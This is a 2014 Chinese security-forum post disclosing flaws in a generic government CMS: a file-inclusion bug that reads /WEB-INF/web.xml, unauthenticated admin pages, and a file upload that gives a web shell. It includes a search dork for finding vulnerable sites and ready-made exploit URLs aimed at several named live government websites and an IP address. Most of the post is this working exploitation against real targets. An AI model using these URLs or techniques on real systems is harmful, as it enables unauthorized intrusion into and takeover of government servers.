某通用型政府cms任意文件上传漏洞/文件包含/未授权访问下载
-
来源:黑吧安全网 浏览:1338次 时间:2014-05-13
关键字 inurl:website/deptwebsite/Content.jsp?filePath=/
0x00:文件包含漏洞(通用型)
说明:测试中,直接访问web.xml是不可访问的,通过该漏洞可成功读取内容。
测试url:Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
漏洞证明:
http://www.nxbb.gov.cn/website/deptwebsite/0566/Content.jsp?issueId=38603&msgType=00&filePath=//WEB-INF/web.xml
http://www.dayawan.gov.cn/website/deptwebsite/0109/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
http://www.gdnx.gov.cn/website/deptwebsite/0477/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml
0x01:未授权访问(通用型)
漏洞证明:
http://www.gdnx.gov.cn/portal/admin/video/AddVideo.jsp
http://www.dayawan.gov.cn/portal/admin/offdocsearch/addItem.jsp
http://www.dayawan.gov.cn/portal/admin/video/AddVideo.jsp
很多页面,不再举例……
0x02:文件上传导致任意代码执行(黑吧安全网部分通用)
说明:测试中未发现明确的版本信息,通过测试,某一类版本的存在任意文件上传导致直接getshell的漏洞。
漏洞证明:
http://59.39.89.120/portal/admin/gazette/InsertFile.jsp
http://market.heyuan.gov.cn/ portal/admin/gazette/InsertFile.jsp
成功上传后,可通过查看源码查找文件目录。

漏洞证明:
继续关注该套cms等待补丁升级
下一篇: PHPCMS全版本通杀SQL注入漏洞下载